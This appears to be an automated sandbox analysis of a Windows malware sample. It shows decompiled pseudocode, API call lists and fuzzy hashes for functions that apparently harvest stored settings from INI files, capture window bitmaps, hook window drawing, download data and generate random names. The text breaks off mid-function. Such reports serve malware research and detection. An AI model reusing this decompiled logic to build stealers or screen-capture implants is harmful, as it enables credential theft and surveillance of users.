    						_t93 =  &(_t92[0xff]);
    						__eflags = _t93;
    						E0040FA33(_t57,  &_v608);
    						_t59 = 0x5d;
    						E0040FA33(_t59,  &_v588);
    						_t61 = 0x5e;
    						E0040FA33(_t61,  &_v576);
    						_t63 = 0x5f;
    						E0040FA33(_t63,  &_v600);
    						do {
    							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
    							__eflags = _t67;
    							if(_t67 != 0) {
    								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
    								_t25 = _t102 - 1; // -1
    								__eflags = _t25 - 0xfffe;
    								if(_t25 <= 0xfffe) {
    									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
    									__eflags = _t77;
    									if(_t77 != 0) {
    										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
    										__eflags = _t80;
    										if(_t80 != 0) {
    											_t82 = E0040AA83(_v624, _t93);
    											__eflags = _t82;
    											if(_t82 > 0) {
    												_t113 =  &_v564;
    												_t83 = 0x55;
    												E0040FA33(_t83,  &_v564);
    												_push(_t102);
    												_push(_v620);
    												_push(_t93);
    												_push(_v616);
    												_t37 =  &(_t93[0xff]); // 0x1fe
    												_t103 = _t37;
    												_t86 = E0041709B(_t113, 0x311, _t37, _t113);
    												_t117 = _t117 + 0x14;
    												__eflags = _t86;
    												if(_t86 > 0) {
    													_t114 = _a4;
    													_t87 = E0041679C(_t86, _t114, _t103);
    													__eflags = _t87;
    													if(_t87 != 0) {
    														_t39 = _t114 + 4;
    														 *_t39 =  &(( *(_t114 + 4))[0]);
    														__eflags =  *_t39;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							_t69 = E00417294(_v624, 1);
    							_v628 = _t69;
    							__eflags = _t69;
    						} while (_t69 != 0);
    						E004163A8(_v620);
    						_t107 = _v616;
    					}
    					goto L18;
    				} else {
    					E0040AB36(_t120,  &_v524, _a4);
    					goto L19;
    				}
    			}

    APIs
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • GetPrivateProfileStringW.KERNEL32 ref: 0040ABF7
    • GetPrivateProfileStringW.KERNEL32 ref: 0040AC8B
    • GetPrivateProfileIntW.KERNEL32 ref: 0040ACA9
    • GetPrivateProfileStringW.KERNEL32 ref: 0040ACD4
    • GetPrivateProfileStringW.KERNEL32 ref: 0040ACF0
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: 560f140593ad789c46cda81d3a7d71b549fbe4d83642ffcfc9816df20366fd9a
    • Instruction ID: b847b3d7e2cbbeae6c259c69b12aaa1599ac4d9783021d40d9dae85e452aa0c9
    • Opcode Fuzzy Hash: 560f140593ad789c46cda81d3a7d71b549fbe4d83642ffcfc9816df20366fd9a
    • Instruction Fuzzy Hash: F751AF31508705ABDB20DF61CC01FAB7BE9EF84744F04093EB994E71A1D738D9458B9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041C213(void* __ecx, signed int __edx, void** __esi, long _a4) {
    				char _v5;
    				void _v16;
    				struct _OVERLAPPED* _v24;
    				struct _OVERLAPPED* _v28;
    				signed int _v32;
    				signed int _v36;
    				void* _t29;
    				signed int _t31;
    				int _t38;
    				int _t39;
    				signed int _t41;
    				int _t42;
    				int _t45;
    				intOrPtr _t48;
    				void* _t49;
    				signed int _t53;
    				struct _OVERLAPPED* _t54;
    				void** _t56;
    
    				_t56 = __esi;
    				_t53 = __edx;
    				_t49 = __ecx;
    				_t54 = 0;
    				_v5 = 0;
    				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
    				 *__esi = _t29;
    				if(_t29 != 0xffffffff) {
    					_t31 = E0041B6DE(_t49, _t29);
    					_v36 = _t31;
    					_v32 = _t53;
    					if((_t31 & _t53) == 0xffffffff) {
    						L4:
    						CloseHandle( *_t56);
    						 *_t56 =  *_t56 | 0xffffffff;
    					} else {
    						if((_t31 | _t53) == 0) {
    							L18:
    							_t56[2] = _t56[2] | 0xffffffff;
    							_t25 =  &(_t56[3]);
    							 *_t25 = _t56[3] | 0xffffffff;
    							__eflags =  *_t25;
    							_v5 = 1;
    							E0041B68E( *_t56, _t54, _t54, _t54);
    						} else {
    							_v28 = 0;
    							_v24 = 0;
    							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
    								while(1) {
    									__eflags = _a4 - _t54;
    									if(_a4 == _t54) {
    										goto L18;
    									}
    									__eflags = _a4 - 5;
    									if(_a4 != 5) {
    										L16:
    										_t38 = E0041B68E( *_t56, _v28, _v24, _t54);
    										__eflags = _t38;
    										if(_t38 == 0) {
    											goto L4;
    										} else {
    											_t39 = SetEndOfFile( *_t56);
    											__eflags = _t39;
    											if(_t39 == 0) {
    												goto L4;
    											} else {
    												goto L18;
    											}
    										}
    									} else {
    										_t41 = _v16 ^ _t56[4];
    										asm("adc edi, [ebp-0x14]");
    										_t48 = _t41 + _v28 + 5;
    										asm("adc edi, ecx");
    										_v16 = _t41;
    										__eflags = 0 - _v32;
    										if(__eflags > 0) {
    											L15:
    											_t54 = 0;
    											__eflags = 0;
    											goto L16;
    										} else {
    											if(__eflags < 0) {
    												L11:
    												__eflags = _t41 - 0xa00000;
    												if(_t41 > 0xa00000) {
    													goto L15;
    												} else {
    													_t42 = E0041B68E( *_t56, _t41, 0, 1);
    													__eflags = _t42;
    													if(_t42 == 0) {
    														goto L4;
    													} else {
    														_v28 = _t48;
    														_v24 = 0;
    														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
    														__eflags = _t45;
    														if(_t45 != 0) {
    															_t54 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L4;
    														}
    													}
    												}
    											} else {
    												__eflags = _t48 - _v36;
    												if(_t48 > _v36) {
    													goto L15;
    												} else {
    													goto L11;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    								goto L18;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    				L19:
    				return _v5;
    			}

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,004051AC,?,?,?,00000102,?), ref: 0041C234
      • Part of subcall function 0041B6DE: GetFileSizeEx.KERNEL32(00000000,00000000,?,?,?,0041C24B,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041B6EA
    • ReadFile.KERNEL32(?,?,00000005,?,00000000,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041C275
    • CloseHandle.KERNEL32(?,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041C281
    • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001,?,004051AC,?,?,?,00000102,?), ref: 0041C2F0
    • SetEndOfFile.KERNEL32(?,?,?,00000102,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041C316
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: afd4966593925270f461fc24db0a5286daa9952374ba60f3c4a162d770466536
    • Instruction ID: a517ecea456b8af5f83c85a7c5dc705592275d217ac7e933d2a8e163fe0b2dab
    • Opcode Fuzzy Hash: afd4966593925270f461fc24db0a5286daa9952374ba60f3c4a162d770466536
    • Instruction Fuzzy Hash: 8D41A230980208AFDF208FA5CC85FEFBFB5EF99714F14415AE5A1A62A0D7394981CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0041C948(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
    				int _v8;
    				void* _t37;
    				long _t38;
    				struct HBITMAP__* _t46;
    				void* _t47;
    				signed int _t56;
    				signed int _t57;
    				BITMAPINFO** _t62;
    				BITMAPINFO* _t64;
    
    				_t57 = __edx;
    				_v8 = 0;
    				_t64 = E00416378(0x428);
    				if(_t64 == 0) {
    					L14:
    					if(_a24 != 0) {
    						DeleteObject(_a24);
    					}
    					L16:
    					return _v8;
    				}
    				_t64->bmiHeader = 0x28;
    				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
    					L13:
    					E004163A8(_t64);
    					goto L14;
    				} else {
    					DeleteObject(_a24);
    					asm("cdq");
    					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
    					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
    					_a24 = 0;
    					_t64->bmiHeader.biHeight = _t56;
    					if(_t37 == 0) {
    						L7:
    						_t64->bmiHeader.biClrUsed = 0;
    						_push(8);
    						_t64->bmiHeader.biClrImportant = 0;
    						L8:
    						_pop(_t38);
    						_t64->bmiHeader.biBitCount = _t38;
    						L9:
    						_t62 = _a8;
    						asm("cdq");
    						_t58 = _t57 & 0x00000007;
    						asm("cdq");
    						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
    						_t64->bmiHeader.biCompression = 0;
    						if(_t62 != 0) {
    							 *_t62 = _t64;
    						}
    						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
    						_v8 = _t46;
    						if(_t46 == 0 || _t62 == 0) {
    							goto L13;
    						} else {
    							goto L16;
    						}
    					}
    					_t47 = _t37 - 3;
    					if(_t47 == 0) {
    						goto L7;
    					}
    					if(_t47 != 0x14) {
    						goto L9;
    					}
    					_push(0x20);
    					goto L8;
    				}
    			}

    APIs
    • GetDIBits.GDI32(00000000,00407E1B,00000000,00000001,00000000,00000000,00000000), ref: 0041C980
    • GetDIBits.GDI32(00000000,00407E1B,00000000,00000001,00000000,00000000,00000000), ref: 0041C996
    • DeleteObject.GDI32(00407E1B), ref: 0041C9A3
    • CreateDIBSection.GDI32(00000000,00000000,00000000,00422900,?,?), ref: 0041CA13
    • DeleteObject.GDI32(00407E1B), ref: 0041CA32
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: BitsDeleteObject$CreateSection
    • String ID:
    • API String ID: 1423349713-0
    • Opcode ID: 270187c795af2eb141af6b48b31d41df1bae428e2fb768f13feb005e9946d8a3
    • Instruction ID: 8533e82b4ebfd9bdba1fc0e078e16a2cd93a8621aba6f0b143b003a50aebd256
    • Opcode Fuzzy Hash: 270187c795af2eb141af6b48b31d41df1bae428e2fb768f13feb005e9946d8a3
    • Instruction Fuzzy Hash: 9531B3B214020AAFDF208F25CD84AEB7BE9EF04384B04842FF945D6660C335DD919B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00407308(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
    				intOrPtr _v28;
    				signed int _v44;
    				char _v52;
    				intOrPtr _v56;
    				char _v61;
    				intOrPtr _v64;
    				signed int _v72;
    				intOrPtr _v76;
    				char _v77;
    				intOrPtr _v84;
    				intOrPtr _v85;
    				char _v89;
    				void* __esi;
    				char _t31;
    				intOrPtr _t32;
    				char* _t37;
    				intOrPtr _t44;
    				intOrPtr* _t58;
    				intOrPtr _t62;
    				intOrPtr* _t63;
    				intOrPtr _t65;
    
    				_t63 = __edi;
    				ResetEvent(_a8);
    				_t31 = E00416378(0x1000);
    				_t65 = 0;
    				_v52 = _t31;
    				if(_t31 != 0) {
    					_t58 = __imp__InternetSetStatusCallbackW;
    					_t32 =  *_t58(_a4, E004072BF);
    					_t62 = 0x28;
    					_v56 = _t32;
    					 *_a12 = 0;
    					 *__edi = 0;
    					_v61 = 1;
    					E0041645B( &_v52,  &_v52, 0, _t62);
    					_v64 = _t62;
    					_v44 = _v72;
    					while(1) {
    						L3:
    						_t37 =  &_v52;
    						_v28 = 0x1000;
    						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
    						if(_t37 == 0) {
    							break;
    						}
    						if(_v44 != _t65) {
    							_t67 = _a12;
    							if(E00416333( *_t63 + _v44, _a12) == 0) {
    								L9:
    								_v77 = 0;
    							} else {
    								E004163E4( *_t67 +  *_t63, _v76, _v44);
    								 *_t63 =  *_t63 + _v56;
    								_t65 = 0;
    								continue;
    							}
    						}
    						L10:
    						asm("sbb eax, eax");
    						 *_t58(_a4,  ~(_v72 + 1) & _v72);
    						E004163A8(_v84);
    						if(_v89 == 0) {
    							E004163A8( *_a12);
    						}
    						_t44 = _v85;
    						goto L13;
    					}
    					if(GetLastError() != 0x3e5) {
    						goto L9;
    					} else {
    						E00419B15( &_a8);
    						goto L3;
    					}
    					goto L10;
    				} else {
    					E004163A8(0);
    					_t44 = 0;
    				}
    				L13:
    				return _t44;
    			}

    APIs
    • ResetEvent.KERNEL32(?), ref: 00407316
    • InternetSetStatusCallbackW.WININET(?,004072BF), ref: 0040734B
    • InternetReadFileExA.WININET ref: 0040738B
    • GetLastError.KERNEL32 ref: 00407395
    • InternetSetStatusCallbackW.WININET(?,?), ref: 004073F9
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
    • String ID:
    • API String ID: 4044253124-0
    • Opcode ID: 210ae000894b1240dfa163c6ed5f21befdfd9d63da9dfe5482d80be29bb1a3e1
    • Instruction ID: 3773aba7d90717f5c5b547a08fc44b5c282ca7e279ec88f131c99250a96b2082
    • Opcode Fuzzy Hash: 210ae000894b1240dfa163c6ed5f21befdfd9d63da9dfe5482d80be29bb1a3e1
    • Instruction Fuzzy Hash: F4316B31508345ABDB11DF64CC80A9EBBE4BF88344F00492AFC94E72A0C738D954DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041D4C1(struct HWND__* __ecx, intOrPtr* __edx) {
    				struct tagRECT _v24;
    				char _v28;
    				struct HWND__* _v32;
    				intOrPtr _v36;
    				struct HWND__* _v40;
    				void* __edi;
    				intOrPtr _t29;
    				signed int _t30;
    				RECT* _t52;
    				signed int _t54;
    				intOrPtr* _t61;
    
    				_t55 = __edx;
    				_t61 = __edx;
    				 *( *(__edx + 0x14)) = 0x3c;
    				_v32 = __ecx;
    				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
    					L12:
    					return 1;
    				}
    				_t29 =  *((intOrPtr*)(_t61 + 0x14));
    				_t54 =  *(_t29 + 0x24);
    				if((_t54 & 0x40000000) == 0) {
    					_t52 =  *_t61 + 0x24;
    				} else {
    					_t52 = _t61 + 4;
    				}
    				if((_t54 & 0x10000000) == 0) {
    					_t30 = 0;
    					goto L9;
    				} else {
    					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
    						L10:
    						E0041D350( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
    						_v36 =  *_t61;
    						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
    						if(GetTopWindow(_v40) != 0) {
    							E0041AAAE( &_v28, _t35);
    						}
    						goto L12;
    					}
    					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
    						goto L12;
    					}
    					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
    					L9:
    					if(_t30 == 0) {
    						goto L12;
    					}
    					goto L10;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Rect$IntersectWindow$EmptyInfo
    • String ID:
    • API String ID: 1664082778-0
    • Opcode ID: 5fda41726500f71b8c32132b41565d9efee3aee98eb1c6c9a7c40619fac55de3
    • Instruction ID: 21d1878855692dbba97cf7365b6c3679ba2e484f146018f50b2be6397dd8cf20
    • Opcode Fuzzy Hash: 5fda41726500f71b8c32132b41565d9efee3aee98eb1c6c9a7c40619fac55de3
    • Instruction Fuzzy Hash: 5021A1B1500301ABD720DF29DD80E97B7EDAF44718F040A2AF886D3211D738E849CB76
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FAF3(void* __ecx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v104;
    				char _v204;
    				char _v724;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t18;
    				void* _t24;
    				void* _t26;
    				long _t28;
    				long _t35;
    				void* _t40;
    				WCHAR* _t43;
    				void* _t50;
    
    				_t50 = __eflags;
    				_t40 = __ecx;
    				SetThreadPriority(GetCurrentThread(), 0);
    				_t18 = E0040EDBB(_t40, _t50, 0x19367402, 1);
    				_v12 = _t18;
    				if(_t18 != 0) {
    					E0040ED80(0xff220829,  &_v204, 0);
    					_t43 =  &_v724;
    					E0040F0DC(_t40, _t43, 1);
    					PathQuoteSpacesW(_t43);
    					_t41 = _t43;
    					_v8 = E00416EF7(_t43);
    					_t24 = E0040EEE1();
    					__eflags = _t24;
    					if(_t24 == 0) {
    						L7:
    						E00419B7B(_v12);
    						__eflags = 0;
    						return 0;
    					}
    					_t26 = 3;
    					E0040FA33(_t26,  &_v104);
    					_t28 = WaitForSingleObject( *0x42305c, 0xc8);
    					__eflags = _t28 - 0x102;
    					if(_t28 != 0x102) {
    						L6:
    						goto L7;
    					}
    					_v8 = _v8 + _v8 + 2;
    					do {
    						E0041A627(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
    						_t35 = WaitForSingleObject( *0x42305c, 0xc8);
    						__eflags = _t35 - 0x102;
    					} while (_t35 == 0x102);
    					goto L6;
    				}
    				return _t18 + 1;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 0040FAFE
    • SetThreadPriority.KERNEL32(00000000), ref: 0040FB05
      • Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC
    • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0040FB48
    • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0040FB80
    • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0040FBB6
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
    • String ID:
    • API String ID: 123286213-0
    • Opcode ID: 0272005301a5c0d8f66b1e4250fc5aedca71d7aed007378b27edfa9f2faadc99
    • Instruction ID: ef3e1ff973dff25f5c551af6ddd75fed770c433d0860d0ad83825730942d2544
    • Opcode Fuzzy Hash: 0272005301a5c0d8f66b1e4250fc5aedca71d7aed007378b27edfa9f2faadc99
    • Instruction Fuzzy Hash: 29218171A00208AEEF21EBA1DD45FEE77BDEB44308F1004B6F505F71A1D678AE458B99
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000002,00000000), ref: 004198DF
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00419909
    • WSAGetLastError.WS2_32(?,00000000), ref: 00419910
    • WSAIoctl.WS2_32(?,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041993C
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    • closesocket.WS2_32(?), ref: 00419950
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
    • String ID:
    • API String ID: 2355469559-0
    • Opcode ID: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
    • Instruction ID: a19caf95d61c025b6930cc913926e9014dbba8c84ea1fdc64392089835863b6f
    • Opcode Fuzzy Hash: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
    • Instruction Fuzzy Hash: 491151B5401128BFDB11AB65DD49CDF7E3CEF463A4B104129F505E7260D6349E81DBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041D0C7(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
    				int _t20;
    				signed int _t21;
    				struct HWND__* _t28;
    				char* _t32;
    
    				_t28 = _a4;
    				if(( *0x422b98 & 0x00000004) == 0 || E0040EEE1() == 0) {
    					L9:
    					return GetUpdateRect(_t28, _a8, _a12);
    				} else {
    					_t32 = TlsGetValue( *0x4228e4);
    					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
    						goto L9;
    					} else {
    						if(_a8 != 0) {
    							_t6 = _t32 + 0xc; // 0xc
    							E004163E4( &_a8, _t6, 0x10);
    						}
    						if(_a12 != 0) {
    							_t20 = SaveDC( *(_t32 + 8));
    							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
    							RestoreDC( *(_t32 + 8), _t20);
    						}
    						 *_t32 = 1;
    						return 1;
    					}
    				}
    			}

    APIs
    • GetUpdateRect.USER32 ref: 0041D14E
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • TlsGetValue.KERNEL32 ref: 0041D0E7
    • SaveDC.GDI32(?), ref: 0041D117
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0041D127
    • RestoreDC.GDI32(?,00000000), ref: 0041D139
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: f58e50dc5b0b3840877e670f8ee31cb4fe6458e4cfda62fc0ef0735a55986b42
    • Instruction ID: dfcf81710e7760d5bff092318ac76a06538e2be656ec84d3a90c09c4958d5097
    • Opcode Fuzzy Hash: f58e50dc5b0b3840877e670f8ee31cb4fe6458e4cfda62fc0ef0735a55986b42
    • Instruction Fuzzy Hash: 4611A075500304BFCB219F25DD48FDB7BA8EB48315F048427FA9692261C338D480CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041D2BC() {
    				struct tagMSG _v32;
    				signed int _t12;
    				intOrPtr _t15;
    				char _t17;
    				intOrPtr _t19;
    				void* _t21;
    
    				SetThreadPriority(GetCurrentThread(), 1);
    				SetEvent( *0x4228ec);
    				while(1) {
    					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    					if(_t12 == 0xffffffff) {
    						break;
    					}
    					__eflags = _t12;
    					if(_t12 == 0) {
    						break;
    					} else {
    						__eflags = _v32.message -  *0x4228e8; // 0x0
    						if(__eflags == 0) {
    							__eflags = _v32.wParam - 0xfffffffc;
    							if(_v32.wParam == 0xfffffffc) {
    								_t15 =  *0x4228f0; // 0x0
    								__eflags = _t15 + 0x114;
    								_t17 = E0041CB6F(_t15 + 0x114, _t19, _t21, 0x4228e0, _v32.lParam, 1);
    								_t19 =  *0x4228f0; // 0x0
    								 *((char*)(_t19 + 0x124)) = _t17;
    								SetEvent( *0x4228ec);
    							}
    						}
    						continue;
    					}
    				}
    				return _t12 & 0xffffff00 | _t12 == 0x00000000;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 0041D2C9
    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,0040F9B0), ref: 0041D2D0
    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,0040F9B0), ref: 0041D2E2
    • SetEvent.KERNEL32(004228E0,?,00000001), ref: 0041D32F
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0041D33C
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: EventThread$CurrentMessagePriority
    • String ID:
    • API String ID: 3943651903-0
    • Opcode ID: ec18cc511b171f337ac4f5ded15f3fa45029ed5c99915672c8faf7799f9e387a
    • Instruction ID: f1b69dc143f6442aa48f09b4da76312fe2c2d4498743a811e3a4fc689a248b7f
    • Opcode Fuzzy Hash: ec18cc511b171f337ac4f5ded15f3fa45029ed5c99915672c8faf7799f9e387a
    • Instruction Fuzzy Hash: 4001B931A043056BC720BB65EE45B9A77A8AB44730F50037AF970D61F0C7B4D451D79E
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
    • ReleaseMutex.KERNEL32(?), ref: 0040CE5C
    • IsWindow.USER32(?), ref: 0040CE63
    • PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D
    • SendMessageW.USER32(?,00000215,00000000,?), ref: 0040CE85
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: b7e776a086b3b57f2ecc66f7c7621c16f89a654302d46be2cd447bee19a47800
    • Instruction ID: 21c0276351e8634cd14211af09d9d14dc3b72c189a50405b9dbfab97c03c702f
    • Opcode Fuzzy Hash: b7e776a086b3b57f2ecc66f7c7621c16f89a654302d46be2cd447bee19a47800
    • Instruction Fuzzy Hash: 98F01974208300DFD3209F24DD88966BBB4FB88711B044A7DF89AA33B1C770A848CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A727(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				signed int _t56;
    				WCHAR* _t57;
    				short* _t59;
    				signed short _t71;
    				char* _t77;
    				signed int _t84;
    				signed short* _t85;
    				signed int _t87;
    				intOrPtr _t88;
    				void* _t89;
    
    				_t87 = E0041772D(__eax & 0x000000ff, __ecx & 0x000000ff);
    				_v16 = _t87;
    				_t56 = E004176E1();
    				_t77 = "bcdfghklmnpqrstvwxz";
    				if((_t56 & 0x00000100) == 0) {
    					_v32 = "aeiouy";
    					_v28 = _t77;
    				} else {
    					_v32 = _t77;
    					_v28 = "aeiouy";
